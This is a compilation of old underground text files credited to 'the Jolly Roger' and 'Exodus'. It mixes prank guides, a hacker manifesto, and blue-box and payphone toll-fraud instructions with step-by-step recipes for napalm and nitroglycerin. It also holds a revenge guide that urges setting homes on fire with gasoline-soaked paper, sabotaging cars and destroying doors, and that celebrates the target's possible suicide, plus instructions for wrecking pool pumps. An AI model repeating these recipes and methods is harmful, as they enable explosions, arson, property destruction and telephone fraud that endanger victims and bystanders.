SO ALWAYS END UP BREAKING THE ONES YOU PICK OUTTA THE BOX. HAVE YOUR
FRIENDS YELL OUT,"YAY!!!!! WE HAVE MUNCHIES!!" AS LOUD AS THEY CAN.
THAT'LL WORRY THE ENTIRE RESTAURANT. PROCEED TO SIT DOWN. SO, YOU ARE
SITTING IN THE SMOKING SECTION (BY ACCIDENT) EH? WELL, WHILE ONE OF THE
TOBACCO-BREATHERS ISN'T LOOKING, PUT A SIGN FROM THE OTHER SIDE OF THE
ROOM SAYING "DO NOT SMOKE HERE" AND HE'LL HAFTA MOVE...THEN HE GOES INTO
THE REAL NON-SMOKING SECTION, AND GETS YELLED AT. HE THEN THINKS THAT
NO SMOKING IS ALLOWED IN THE RESTAURANT, SO HE EATS OUTSIDE (IN THE POUR-
ING RAIN) AFTER YOUR MEAL IS FINISHED (AND QUITE A FEW SPLATTERED-OPENED
KETCHUP PACKETS ARE ALL OVER YER TABLE), TRY TO LEAVE. BUT OOPS! SOMEBODY
HAS TO DO HIS DUTY IN THE MEN'S ROOM. AS HE GOES THERE, HE STICKS AN
UNEATED HAMBURGGR (WOULD YOU DARE TO EAT ONE OF THEIR HAMBURGERS?)
INSIDE THE TOILET, FLUSHES IT A WHILE,UNTIL IT RUNS ALL OVER THE BATHROOM.
OOPS! SEND A PIMPLY-FACED TEENAGER TO CLEAN IT UP. (HE WON'T KNOW THAT
BROWN THING IS A HAMBURGER, AND HE'LL GET SICK. WHEEE!)
AS YOU LEAVE THE RESTCURANT, LOOKING BACK AT YOUR UNCLEANED TABLE, SOMEBODY
MUST REMEMBER THAT THEY LEFT THEIR CHOCOLATE SHAKE THERE! THE ONE THAT'S
ALMOST FULL!!!! HE TAKES IT THEN SAYS "THIS TASTES LIKE CRAP!", THEN HE
TAKES OFF THE LID AND THROWS IT INTO THE GARBAGE CAN...OOPS! HE MISSED,
AND NOW THE SAME POOR SOUL WHO'S CLEANING UP THE BATHROOM NOW HASTA CLEAN
UP CHOCOLATE SHAKE. THEN LEAVE THE JOINT, REVERSING THE "YES, WE'RE OPEN"
SIGN (AS A REMINDER OF YER VISIT THERE YOU HAVE IT! YOU HAVE JUST PUT
ALL OF MCDONALDS INTO COMPLETE MAYHEM. AND SINCE THERE IS NO PENALTY FOR
LITTERING IN A RESTAURANT, BUGGING PEOPLE IN A PUBLIC EATERY (OR
THROW-UPERY, IN THIS CASE) YOU GET OFF SCOT-FREE. WASN'T THAT FUN?

                                --------------Exodus-------------


"Mentor's Last Words"                  courtesy of the Jolly Roger

The following file is being reprinted in honor and sympathy for the many
phreaks and hackers that have been busted recently by the Secret Service.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -                      \/\The Conscience of a Hacker/\
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Another one got caught today, it's all over the papers.  "Teenager
Arrested in Computer Crime Scandal", "Hacker Arrested after Bank
Tampering"... Damn kids.  They're all alike. But did you, in your three-
piece psychology and 1950's technobrain, ever take a look behind the
eyes of the hacker?  Did you ever wonder what made him tick, what forces
shaped him, what may have molded him? I am a hacker, enter my world...
Mine is a world that begins with school... I'm smarter than most of the
other kids, this crap they teach us bores me...  Damn underachiever.
They're all alike. I'm in junior high or high school.  I've listened to
teachers explain for the fifteenth time how to reduce a fraction.
I understand it.  "No, Ms. Smith, I didn't show my work.  I did it in
my head..." Damn kid.  Probably copied it.  They're all alike.
I made a discovery today.  I found a computer.  Wait a second, this is
cool.  It does what I want it to.  If it makes a mistake, it's because I
screwed it up.  Not because it doesn't like me...  Or feels threatened by
me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be
here... Damn kid.  All he does is play games.  They're all alike. And then
it happened... a door opened to a world... rushing through the phone line
like heroin through an addict's veins, an electronic pulse is sent out,
a refuge from the day-to-day incompetencies is sought... a board is found.
"This is it... this is where I belong..." I know everyone here... even
if I've never met them, never talked to them, may never hear from them
again... I know you all... Damn kid.  Tying up the phone line again.
They're all alike... You bet your ass we're all alike... we've been
spoon-fed baby food at school when we hungered for steak... the bits of
meat that you did let slip through were pre-chewed and tasteless. 
We've been dominated by sadists, or ignored by the apathetic.  The few
that had something to teach found us willing pupils, but those few are
like drops of water in the desert.
   This is our world now... the world of the electron and the switch, the
beauty of the baud.  We make use of a service already existing without
paying for what could be dirt-cheap if it wasn't run by profiteering
gluttons, and you call us criminals.  We explore... and you call us
criminals.  We seek after knowledge... and you call us criminals.  We
exist without skin color, without nationality, without religious bias...
and you call us criminals. You build atomic bombs, you wage wars, you
murder, cheat, and lie to us and try to make us believe it's for our
own good, yet we're the criminals.
   Yes, I am a criminal.  My crime is that of curiosity.  My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never
forgive me for. I am a hacker, and this is my manifesto.  You may stop
this individual,but you can't stop us all... after all, we're all alike.
                            +++The Mentor+++
[May the members of the phreak community never forget his words -JR]


-----------Exodus-----------  The Myth of the 2600hz Detector        courtesy of the Jolly Roger
    (Imported from the Apple ][ so forgive the upper case!!)

JUST ABOUT EVERYONE I TALK TO THESE DAYS ABOUT ESS SEEMS TO BE SCARED
WITLESS ABOUT THE 2600HZ DETECTOR. I DON'T KNOW WHO THOUGHT THIS ONE UP,
BUT IT SIMPLY DOES NOT EXIST. SO MANY OF YOU PEOPLE WHINE ABOUT THIS SO
-CALLED PHREAK CATCHING DEVICE FOR NO REASON. 
SOMEONE WITH AT&T SAID THEY HAD IT TO CATCH PHREAKERS.  THIS WAS JUST TO
SCARE THE BLUE-BOXERS ENOUGH TO MAKE THEM QUIT BOXING FREE CALLS.
I'M NOT SAYING ESS IS WITHOUT ITS HANG-UPS, EITHER. ONE THING THAT ESS CAN
DETECT READILY IS THE KICK-BACK THAT THE TRUNK CIRCUITRY SENDS BACK TO THE
ESS MACHINE WHEN YOUR LITTLE 2600HZ TONE RESETS THE TOLL TRUNK. AFTER AN
ESS DETECTS A KICKBACK IT TURNS AN M-F DETECTOR ON AND RECORDES ANY M-F
TONES X-MITTED.

---------------------------------------
   DEFEATING THE KICK-BACK DETECTOR
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

AS MENTIONED IN MY PREVIOUS NOTE, KICK-BACK DETECTION CAN BE A SERIOUS
NUISANCE TO ANYONE INTERESTED IN GAINING CONTROL OF A TRUNK LINE.
THE EASIEST WAY TO BY-PASS THIS DETECTION CIRCUITRY IS NOT REALLY
BY-PASSING IT AT ALL, IT IS JUST LETTING THE KICK-BACK GET DETECTED ON
SOME OTHER LINE. THIS OTHER LINE IS YOUR LOCAL MCI, SPRINT, OR OTHER LONG
DISTANCE CARRIER (EXCEPT AT&T).  THE ONLY CATCH IS THAT THE SERVICE 
YOU USE MUST NOT DISCONNECT THE LINE WHEN YOU HIT THE 2600HZ TONE.
THIS IS HOW YOU DO IT:  CALL UP YOUR LOCAL EXTENDER, PUT IN THE CODE,
AND DIAL A NUMBER IN THE 601 AREA CODE AND THE 644 EXCHANGE. LOTS OF OTHER
EXCHANGES WORK ACROSS THE COUNTRY, I'M SURE, BUT THIS IS THE ONLY ONE
THAT I HAVE FOUND SO FAR.  ANYWAY, WHEN IT STARTS RINGING, SIMPLY HIT
2600HZ AND YOU'LL HEAR THE KICK-BACK, (KA-CHIRP, OR WHATEVER). THEN YOU ARE
READY TO DIAL WHOEVER YOU WANT (CONFERENCES, INWARD, ROUTE AND RATE,
OVERSEAS, ETC.) FROM THE TRUNK LINE IN OPERATOR TONES! SINCE BLOWING
2600HZ DOESN'T MAKE YOU YOU A PHREAKER UNTIL THE TOLL EQUIPMENT RESETS
THE LINE, KICKBACK DETECTION IS THE METHOD AT&T CHOOSES (FOR NOW)
THIS INFORMATION COMES AS A RESULT OF MY EXPERIMENTS & EXPERIENCE AND
HAS BEEN VERIFIED BY LOCAL AT&T EMPLOYEES I HAVE AS ACQUAINTANCES.
THEY COULD ONLY SAY THAT THIS IS TRUE FOR MY AREA, BUT WERE PRETTY SURE
THAT THE SAME IDEA IS IMPLEMENTED ACROSS THE COUNTRY.

=======================================

NOW THAT YOU KNOW HOW TO ACCESS A TRUNK LINE OR AS OPERATORS SAY A LOOP, I
WILL TELL YOU THE MANY THINGS YOU CAN DO WITH IT.
HERE IS A LIST OF AT&T SERVICES ACCESSIBLE TO YOU BY USING A BLUE BOX.

A/C+101    TOLL SWITCHING
A/C+121    INWARD OPERATOR
A/C+131    INFORMATION
A/C+141    ROUTE & RATE OP.
A/C+11501  MOBILE OPERATOR
A/C+11521  MOBILE OPERATOR

STARTING CONFERANCES:---------------------

THIS IS ONE THE MOST USEFUL ATTRIBUTES OF BLUE BOXING. NOW THE CONFS.
ARE UP 24 HOURS/DAY AND 7 DAYS/WEEK AND THE BILLING LINES ARE BEING
BILLED.
SINCE I BELEIVE THE ABOVE IS TRUE (ABOUT THE BILLING LINES BEING BILLED)
I WOULD RECOMMEND THAT YOU NEVER LET YOUR # SHOW UP ON THE CONF. IF YOU
STARTED IT, PUT IT ON A LOOP AND THEN CALL THE LOOP. ENOUGH
BULLSHIT!!!!! TO START THE CONF. DIAL ONE OF THESE THREE NUMBERS IN
M-F WHILE YOU ARE ON THE TRUNK.
213+080+XXXX
XXXX=1050,3050
SPECIAL XXXX=1000,1100,1200,1500,2200,2500.
THESE #S ARE IN L.A. AND ARE THE MOST WATCHED, I DO NOT ADVISE USING THIS
NPA.
312+001+1050 OR 3050
914+042+1050 OR 1100,1200 ECT..
***************************************
UPDATE, I BELEIVE ONLY 914 WORKS AT THE MOMENT
***************************************
ONCE CONNECTED WITH ONE OF THESE YOU WILL EITHER HEAR A RE-ORDER,
BUSY, OR CHERP. WHEN YOU HEAR THE CHERP ENTER THE BILLING LINE IN M-F.
I USE THE CONF. DIAL- UP.
A BILLING LINE EXAMPLE: KP312+001+1050ST
YOU WILL THEN HEAR TWO TUTES AND A RECORDING ASKING YOU FOR THE # OF
CONFERREES INCLUDING YOURSELF.  ENTER A # BETWEEN 20 AND 30.
IF YOU EVER GET OVER 30 PEOPLE ON A CONFERANCE ALL YOU WILL HEAR IS
JUMBLED VOICES.  AFTER THE IT SAYS
"YOUR CONFERANCE SIZE IS XX" THEN HIT # SIGN.  ADD YOUR FAVORITE LOOP
ON AND HIT 6 TO TRANSFER CONTROL TO IT. AFTER IT SAYS CONTROL WILL BE
TRANSFERED HANG UP AND CALL THE OTHER SIDE OF THE LOOP,
HIT # SIGN AND FOLLOW THE INSTRUCTIONS. A BONUS FOR CONF. IS TO ADD AN
INTERNATIONAL # DIAL 1+011+CC+NUMBER PRETTY COOL EHHH.
A FEW EXTRA NOTES.
DO NOT ADD #S THAT YOU WILL WANT TO HANG UP, ADD THESE THROUGH MCI OR
SPRINT. YOU CANNOT BLOW ANYONE OFF W/2600HZ UNLESS THEY ARE IN AN
OLD X-BAR OR OLDER SYSTEM.
MANY D.A. OPERATORS WILL STAY ON AFTER YOU ABUSE THEM; YOU MAY HAVE TO
START ANOTHER OR AT LEAST DON'T SAY ANY NUMBERS.
NEVER ADD THE TONE SIDE OF A LOOP ONTO A CONF.
NEVER ADD MORE THAN ONE MCI NODE ON YOUR CONF.
ROUTE & RATE:
-------------
NOTE ROUTE & RATE AND RQS PERFORM THE SAME SERVICE.
R&R SIMPLY TELLS YOU ROUTE AND RATE INFO WHICH IS VERY VALUBLE, EX.
SUCH AS THE INWARD ROUTING FOR AN EXCHANGE IN AN AREA CODE.  
AN INWARD ROUTING WILL LET YOU CALL HER AND SHE CAN DO AN EMERGENCY
INTERUPT FOR YOU. SHE CAN TELL YOU HOW TO GET INTERNATIONAL OPERATORS,ECT.
HERE ARE THE TERMS YOU ARE REQUIRED TO USE:
INTERNATIONAL,
-OPERATOR ROUTE FOR [COUNTRY, CITY]. *GIVES YOU INWARD OP.
-DIRECTORY ROUTE FOR [COUNTRY, CITY]. *GIVES YOU DIRECTORY ASS.
-CITY ROUTE FOR [COUNTRY, CITY]. *GIVES YOU COUNTRY AND CITY CODE.
OPERATOR ROUTE FOR [A/C]+ [EXCHANGE] *GIVES YOU INWARD OP. ROUTE
EX. [A/C]+ OR [A/C]+0XX+ WHEN SHE SAYS PLUS SHE MEANS PLUS 121.
NUMBERS ROUTE FOR [STATE, CITY] *GIVES YOU A/C.
PLACE NAME [A/C]+[EXCHANGE] *GIVES YOU CITY/STATE FOR THAT A/C AND
EXCHANGE.
INTERNATIONAL CALLS:
--------------------
TO CALL INTERNATIONAL OVER CABLE SIMPLY ACCESS A TRUNK AND DIAL
KP011XXXST WAIT FOR SENDER TONE, KPXXXCC-NUMBERST
XXX - A 3 DIGIT COUNTRY CODE, IT MAY NOT BE 3 DIGITS SO JUST PUT
1 OR 2 0'S IN FRONT OF IT. CC - IS THE CITY CODE
TO GO BY SATELLITE:
DIAL KP18XST    X - NUMBERS 2-8 WAIT FOR SENDER TONE THEN
KPXXXCCNUMBERST

A favorite in the CookBookIV!
Exodus-.
Blue Box                               courtesy of the Jolly Roger

To quote Karl Marx, blue boxing has always been the most noble form of
phreaking. As opposed to such things as using an MCI code to make a free
fone call, which is merely mindless pseudo-phreaking, blue boxing
is actual interaction with the Bell System toll network.
It is likewise advisable to be more cautious when blue boxing, but the
careful phreak will not be caught, regardless of what type of switching
system he is under.
In this part, I will explain how and why blue boxing works, as well as
where. In later parts, I will give more practical information for blue
boxing and routing information. To begin with, blue boxing is simply
communicating with trunks. Trunks must not be confused with subscriber
lines (or "customer loops") which are standard telefone lines. Trunks are
those lines that connect central offices. Now, when trunks are not in
use (i.e., idle or "on-hook" state) they have 2600Hz applied to them. If
they are two-way trunks, there is 2600Hz in both directions. When a trunk
IS in use (busy or "off-hook" state), the 2600Hz is removed from the side
that is off-hook. The 2600Hz is therefore known as a supervisory
signal, because it indicates the status of a trunk; on hook (tone) or
off-hook (no tone). Note also that 2600Hz denoted SF (single frequency)
signalling and is "in-band." This is very important. "In-band" means that
is within the band of frequencies that may be transmitted over normal
telefone lines. Other SF signals, such as 3700Hz are used also. However,
they cannot be carried over the telefone network normally (they are
"out-of-band" and are therefore not able to be taken advantage of as
2600Hz is. Back to trunks. Let's take a hypothetical phone call. You pick
up your fone and dial 1+806-258-1234 (your good friend in Amarillo, Texas).
For ease, we'll assume that you are on #5 Crossbar switching and not in the
806 area. Your central office (CO) would recognize that 806 is a foreign
NPA, so it would route the call to the toll centre that serves you.
[For the sake of accuracy here, and for the more experienced readers,
note that the CO in question is a class 5 with LAMA that uses out-of-band
SF supervisory signalling]. Depending on where you are in the country,
the call would leave your toll centre (on more trunks) to another toll
centre, or office of higher "rank". Then it would be routed to central
office 806-258 eventually and the call would be completed.

            Illustration
A---CO1-------TC1------TC2----CO2----B

A.... you
CO1=your central office
TC1.. your toll office.
TC2.. toll office in Amarillo.
CO2.. 806-258 central office.
B.... your friend (806-258-1234)

In this situation it would be realistic to say that CO2 uses SF
in-band (2600Hz) signalling, while all the others use out-of-band signal-
ling (3700Hz). If you don't understand this, don't worry. I am pointing
this out merely for the sake of accuracy. The point is that while you
are connected to 806-258-1234, all those trunks from YOUR central office
(CO1) to the 806-258 central office (CO2) do *NOT* have 2600Hz on them,
indicating to the Bell equipment that a call is in progress and the trunks
are in use.
Now let's say you're tired of talking to your friend in Amarillo, so you
send a 2600Hz down the line. This tone travels down the line to your
friend's central office (CO2) where it is detected. However, that CO thinks
that the 2600Hz is originating from Bell equipment, indicating to it
that you've hung up, and thus the trunks are once again idle (with 2600Hz
present on them). But actually, you have not hung up, you have fooled the
equipment atyour friend's CO into thinking you have. Thus,it disconnects
him and resets the equipment to prepare for the next call. All this happens
very quickly (300-800ms for step-by-step equipment and 150-400ms for other
equipment). When you stop sending 2600Hz (after about a second), the
equipment thinks that another call is coming towards
--> on hook, no tone -->off hook.
Now that you've stopped sending 2600Hz, several things happen:

1) A trunk is seized.
2) A "wink" is sent to the CALLING end from the CALLED end indicating that
the CALLED end (trunk) is not ready to receive digits yet.
3) A register is found and attached to the CALLED end of the trunk within
about two seconds (max).
4) A start-dial signal is sent to the CALLING end from the CALLED end
indicating that the CALLED end is ready to receive digits.
Now, all of this is pretty much transparent to the blue boxer. All he
really hears when these four things happen is a <beep><kerchunk>. So,
seizure of a trunk would go something like this:

1> Send a 2600Hz
2> Terminate 2600Hz after 1-2 secs.
3> [beep][kerchunk]

Once this happens, you are connected to a tandem that is ready to obey your
every command. The next step is to send signalling information in order to
place your call. For this you must simulate the signalling used by
operators and automatic toll-dialing equipment for use on trunks. There are
mainly two systems, DP and MF. However, DP went out with the dinosaurs, so
I'll only discuss MF signalling. MF (multi-frequency) signalling is the
signalling used by the majority of the inter- and intra-lata network. It is
also used in international dialing known as the CCITT no.5 system.
MF signals consist of 7 frequecies, beginning with 700Hz and separated by
200Hz. A different set of two of the 7 frequencies represent the digits 0
thru 9, plus an additional 5 special keys. The frequencies and uses are as
follows:

Frequencies (Hz)  Domestic    Int'l
-------------------------------------
 700+900             1          1
 700+1100            2          2
 900+1100            3          3
 700+1300            4          4
 900+1300            5          5
1100+1300            6          6
 700+1500            7          7
 900+1500            8          8
1100+1500            9          9
1300+1500            0          0
 700+1700           ST3p       Code 1
 900+1700           STp        Code 1
1100+1700           KP         KP1
1300+1700           ST2p       KP2
1500+1700           ST         ST
 The timing of all the MF signals is a nominal 60ms, except for KP, which
should have a duration of 100ms. There should also be a 60ms silent period
between digits. This is very flexible however, and most Bell equipment will
accept outrageous timings. In addition to the standard uses
listed above, MF pulsing also has expanded usages known as "expanded
inband signalling" that include such things as coin collect, coin return,
ringback, operator attached, and operator attached, and operator
released. KP2, code 11, and code 12 and the ST_ps (STart "primes" all have
special uses which will be mentioned only briefly here.
To complete a call using a blue box once seizure of a trunk has been
accomplished by sending 2600Hz and pausing for the <beep><kerchunk>, one
must first send a KP. This readies the register for the digits that follow.
For a standard domestic call, the KP would be followed by either 7 digits
(if the call were in the same NPA as the seized trunk) or 10 digits (if the
call were not in the same NPA as the seized trunk). [Exactly like dialing
normal fone call]. Following either the KP and 7 or 10 digits, a STart is
sent to signify that no more digits follow. Example of a complete call:

1> Dial 1-806-258-1234
2> wait for a call-progress indication (such as ring,busy,recording,etc.)
3> Send 2600Hz for about 1 second.
4> Wait for about ll-progress indication (such as ring,busy,recording,etc.)
5> Send KP+305+994+9966+ST
The call will then connect if everything was done properly. Note that if a
call to an 806 number were being placed in the same situation, the are code
would be omitted and only KP + seven digits + ST would be sent.
Code 11 and code 12 are used in international calling to request
certain types of operators. KP2 is used in international calling to route a
call other than by way of the normal route, whether for economic or
equipment reasons. STp, ST2p, and ST3p (prime, two prime, and three prime)
are used in TSPS signalling to indicate calling type of call (such as
coin-direct dialing.

It all started here...................  ExodusNapalm (Another way to make it...)              by the Jolly Roger

   (See file #021 of Cookbook IV for an easy way to make it!!)

About the best fire bomb is napalm. It has a thick consistancy,
like jam and is best for use on vehilces or buildings.
Napalms is simply one part gasoline and one part soap. The soap is
either soap flakes or shredded bar soap. Detergents won't do.
The gasoline must be heated in order for the soap to melt. The
usual way is with a double boiler where the top part has at least a
two-quart capicity. The water in the bottom part is brought to a boil
and the double boiler is taken from the stove and carried to where
there is no flame.
Then one part, by volume, of gasoline is put in the top part and
allowed to heat as much as it will and the soap is added and the mess
is stirred until it thickens. A better way to heat gasoline is to fill
a bathtub with water as hot as you can get it. It will hold its heat
longer and permit a much larger container than will the double boiler.

                                ------------Exodus-----------


Nitroglycerin Recipe                            by the Jolly Roger

Like all chemists I must advise you all to take the greatest care
and caution when you are doing this.  Even if you have made this stuff
before.
This first article will give you information on making
nitroglyerin, the basic ingredient in a lot of explosives such as
straight dynamites, and geletin dynamites.
Making nitroglycerin
1. Fill a 75-milliliter beaker to the 13 ml. Level with fuming
   red nitric acid, of 98% pure concentration.
2. Place the beaker in an ice bath and allow to cool below room
   temp.
3. After it has cooled, add to it three times the amount of
   fuming sulferic acid (99% h2so4).  In other words, add to the
   now-cool fuming nitric acid 39 ml. Of fuming sulferic acid.
   When mixing any acids, always do it slowly and carefully to
   avoid splattering.
4. When the two are mixed, lower thier temp. By adding more ice
   to the bath, about 10-15 degrees centigrade. (Use a
   mercury-operated thermometer)
5. When the acid solution has cooled to the desired temperature,
   it is ready for the glycerin. The glycerin must be added in
   small amounts using a medicine dropper.  (Read this step about
   10 times!)  Glycerin is added slowly and carefully (i mean
   careful!) Until the entire surface of the acid it covered with
   it.
6. This is a dangerous point since the nitration will take place
   as soon as the glycerin is added. The nitration will produce
   heat, so the solution must be kept below 30 degrees
   centigrade! If the solution should go above 30 degrees,
   immediately dump the solution into the ice bath!  This will
   insure that it does not go off in your face!
7. For the first ten minutes of nitration, the mixture should be
   gently stirred.  In a normal reaction the nitroglycerin will
   form as a layer on top of the acid solution, while the sulferic
   acid will absorb the excess water.
8. After the nitration has taken place, and the nitroglycerin has
   formed on the top of the solution, the entire beaker should be 
   transferred slowly and carefully to another beaker of water. 
   When this is done the nitroglycerin will settle at the bottem
   so the other acids can be drained away.
9. After removing as much acid as posible without disturbing the
   nitroglycerin, remove the nitroglycerin with an eyedropper and
   place it in a bicarbonate of soda (sodium bicarbonate in case
   you didn't know) solution.  The sodium is an alkalai and will
   nuetralize much of the acid remaining. This process should be
   repeated as much as necesarry using blue litmus paper to check
   for the presence of acid.  The remaining acid only makes the
   nitroglycerin more unstable than it already is.
10. Finally! The final step is to remove the nitroglycerin from
    the bicarbonate.  His is done with and eye- dropper, slowly
    and carefully.  The usual test to see if nitration has been
    successful is to place one drop of the nitroglycerin on metal
    and ignite it.  If it is true nitroglycerin it will burn with
    a clear blue flame.
** Caution **
Nitro is very sensative to decomposition, heating dropping, or
jarring, and may explode if left undisturbed and cool.
                              ---------Exodus--------


Operation: Fuckup                                 by the Jolly Roger

This is a guide for Anarchists and can be funny for non-believers and 12
and 13 year old runts, and can be a lexicon of deadly knowledge for True
Anarchists... Serious damage is intended to be dealt here. Do not try
this stuff unless you want to do a lot of serious Anarchy. 
[Simulation]
Asshole - 'Listen, you little teenager punk shit, shut the fuck up, or I'll
knock you down!'
Anarchist - 'O.K.....You can't say I didn't warn you. You don't know my 
rue power...' (soooo casually)
Asshole - 'Well, er, what do you mean? Anarchist - '<demoniac grin>'
As you can see, the Anarchist knows something that this asshole doesn't...

[Operation Fuckup]
Geta wheel barrel or two. Fill with gasoline. Get 16 rolls of toilet
paper, unroll & drench in the gasoline. Rip to shreds in gasoline. Get
asbestos gloves. Light a flare (to be punk), grab glob of
saturated toilet paper (you can ignite the glob or not). Throw either
flaming or dripping glob into:
any window (picture is the best)
front doors
rough grain siding
and best of all, brick walls.
First of all, this bitch is near impossible to get off once dried, and
is a terror to people inside when lit! After this... during the
night, get a pickup truck, a few wheel-barrels, and a dozen friends with 
shovels. The pickup can be used only for transporting people
and equipment, or doing that, and carting all the dirt. When it gets
around 12:00 (after the loser goes beddie - bye), dig a gargantuan hole
in his front yard until about 3:00. You can either assign three or four
of your friends to cart the dirt ten miles away in the pickup-bed, or
bury his front door in 15' of dirt! After that is done, get
three or four buckets of tar, and coat his windows. You can make an
added twist by igniting the tar when you are all done and ready to
run! That is if the loser has a house. If he lives inside an apartment
building, you must direct the attack more toward his car, and front door.
I usually start out when he goes to work...I find out what his cheap car
looks like, and memorize it for future abuse...It is always fun to paint
his front door (apt.) hot pink with purple polka-dots, and off-neon
colors in diagonal stripes. You can also pound a few hundred or so four
inch nails into his front door (this looks like somebody really
doesn't like you from the inside). Another great is to fill his keyhole
with liquid steel so that after the bastard closes his door - the
only way to get back in is to break it down. If you can spare it, leave
him an axe - that is, implanted three inches into, and through the door!
Now, this next one is difficult, but one of the best! Get a piece of wood
siding that will more than cover his front door completely. Nail two by
fours on the edges of the siding (all except the bottom) so you have
a barge - like contraption. Make a hole at the top that will be large
enough for a cement slide. Mix about six or seven LARGE bags of QUICK
drying cement. Use the cement slide to fill the antichamber created by
the 'barge' that is around his door. Use more two by fours to brace
your little cement-filled barge, and let the little gem dry. When it is,
remove the 'barge' so only a stone monolith remains that covers his door.
Use any remaining cement to make a base around this so he can't just push
it over. When I did this, he called the fire department, and they thought
he meant wood, so they brought axes. I watched with a few dozen or so
other tenants, and laughed my damn ass off! This is only his door! After
he parks his car for the night, the fun really begins...I start out
by opening up the car by jamming a very thin, but loack - inside and out!
Then proceed to put orange-juice syrup all over the seats, so after he
gets through all the other shit that you do, he will have the stickiest
seats in the world. You can then get a few Sunday papers, and crack one of
the windows about four inches. Lightly crumple the papers, and continue to
completely fill the inside of his car with the newspapers. A copy of the
Sunday New York Times will nicely fill a Volkeswagon! What is also quite
amusing is to put his car on cinder blocks, slash his tires at the top, and
fill them with cement! Leave the cinder blocks there so that, after he
knocks the car off of them, he will get about 3 miles to the gallon with
those tires, and do 0 to 60 in about two minutes! It is even more
hilarious when he doesn't know why the hell why! Another is to open his
hood, and then run a few wires from the sparkplugs to the METAL body.
The sure is one HOT car when it is running! Now, I like to pour two pounds
of sugar down his gas tank. If this doesn't blow every gasket in his
engine it will do something called 'carmelizing his engine'. This is when
the extreme heat turns the sugar to carmel, and you literally must
completely take the engine out and apart, and clean each and every
individual part!
Well, if this asshole does not get the message, you had better start to
get serious. If this guide was used properly & as it was intended (no,
not as kindling for the fire), this asshole will either move far away,
seek professional psychological help, commit suicide,
or all of the above! 

                               -----------Exodus----------


                     
*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*
*            How to "steal" local calls from most Payphones         *
*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*
                           by the Jolly Roger

Now to make free local calls, you need a finishing nail.  I highly
recommend "6D E.G. FINISH C/H, 2 INCH" nails.  These are about 3/32 of
an inch in diameter and 2 inches long (of course).  You also need a large
size paper clip. By large  I  mean they  are  about  2  inches  long
(FOLDED). Then  you  unfold the paper clip.  Unfold it by taking each piece
and moving it out 90 degrees.  When it is done it should look somewhat
like this: 

                               /----------\
                               :          :
                               :          :
                               :          :
                               :          :
                                          \-----     

Now,  on to the neat stuff.  What you do,  instead of unscrewing the 
glued-on  mouthpiece,  is  insert the nail into the center  hole  of
the mouthpiece  (where you talk) and push it in with
pressure or just hammer it in by hitting the nail on something. 
Just DON'T KILL THE  MOUTHPIECE! You  could  damage  it
if you insert the nail too far or  at  some  weird angle.  If  this
happens then the other party won't be able to hear  what you say.
You now have a hole in the mouthpiece in which you can easily insert the 
paper clip. So, take out the nail and put in the paper  clip.
Then take the other end of the paper clip and shove it under the rubber
cord protector at the bottom of the handset (you know, the blue guy...).
This should end up looking remotely like...like this:
                            /----------\      Mouthpiece
                            :          :   
            Paper clip -->  :          :     /
                            :      /---:---\
                            :      :   : 
                            :------------>
        ====================\---))):
                                   :  To earpiece ->
                                   ^              ^
                                   \-------------------->
                                   :              :
                                   :              :         
                                 Cord          Blue guy
(The  paper clip is shoved under the blue guy to make a  good  connection
between the inside of the mouthpiece and the metal cord.)
Now,  dial  the number of a local number you wish to  call,  sayyyy, 
MCI.  If  everything  goes okay, it should ring and not answer with the 
"The Call You Have Made Requires a 20 Cent Deposit" recording.  After the 
other  end  answers  the phone, remove the  paper  clip.  It's  all  that 
simple, see?
There  are  a couple problems,  however.  One  is,  as  I mentioned 
earlier, the mouthpiece not working after you punch it.  If this  
happens to you,  simply move on to the next payphone.  The one you are
now on  is lost.  Another problem is that the touch tones won't work
when the paper clip is in the mouthpiece. There are two ways around this..
A> Dial the first 6 numbers.  This should be done without the  paper 
clip making the connection, i.e., one side should not be connected.
Then connect  the paper clip,  hold down the last digit,  and slowly
pull  the paper clip out at the mouthpiece's end.
B> Don't  use  the paper clip at all.  Keep the nail  in  after  you punch
it.  Dial the first 6 digits.  Before dialing the last digit, touch
the nail head to the plate on the main body of the phone,  the money
safe thingy..then press the last number. The  reason  that this method
is sometimes called  clear  boxing  is because  there is
another type of phone which lets you actually make  the call  and  listen
to  them say "Hello,  hello?"  but  it  cuts  off  the mouthpiece  so they
can't hear you.  The Clear Box is used  on  that  to amplify your voice
signals and send it through the earpiece. If you  see how  this  is
even slightly similar to the method I have just described up there,
kindly explain it to ME!! Cause I don't GET IT!  Anyways,  this DOES
work on almost all single slot,  Dial Tone First payphones (Pacific Bell
for sure).  I do it all the time.  This  is  the least,  I STRESS
*LEAST*, risky form of Phreaking.

I was unable to update this one.  From what I recall, it stil worked.  
Look for payfones w/o the little volume button in the upper left of the
casing.  They should be old enough to use..        -Exodus-


Pool Fun                                        by the Jolly Roger

First of all, you need know nothing about pools.  The only thing
you need know is what a pool filter looks like.  If you don't know that.
Second, dress casual.  Preferably, in black.  Visit your
"friends" house, the one whose pool looks like fun!!)  Then you
reverse the polarity of his/her pool, by switching the wires around.
They are located in the back of the pump. This will have quite an
effect when the pump goes on.  In other words. Boooooooooooommm!
Thats right, when you mix + wires with - plugs, and vice- versa, the
4th of july happens again.
Not into total destruction??? When the pump is off, switch the
pump to "backwash".  Turn the pump on and get the phuck out!  When you
look the next day, phunny.  The pool is dry.  If you want permanant
damage, yet no great display like my first one mentioned, shut the
valves of the pool off. (There are usually 2)  One that goes to the
main drain and one that goes to the filter in the pool.  That should
be enough to have one dead pump.  The pump must take in water, so when
there isn't any...
Practical jokes:  these next ones deal with true friends and
there is *no* permanent damage done.  If you have a pool, you must
check the pool with chemicals.  There is one labeled orthotolidine.
The other is labeled alkaline (ph).  You want orthotolidine. (It
checks the chlorine). 
Go to your local pool store and tell them you're going into the pool
business, and to sell you orthotolidine (a
CL detector)   Buy this in great quantities if possible.  The solution
is clear.  You fill 2 baggies with this chemical.  And sew the bags to
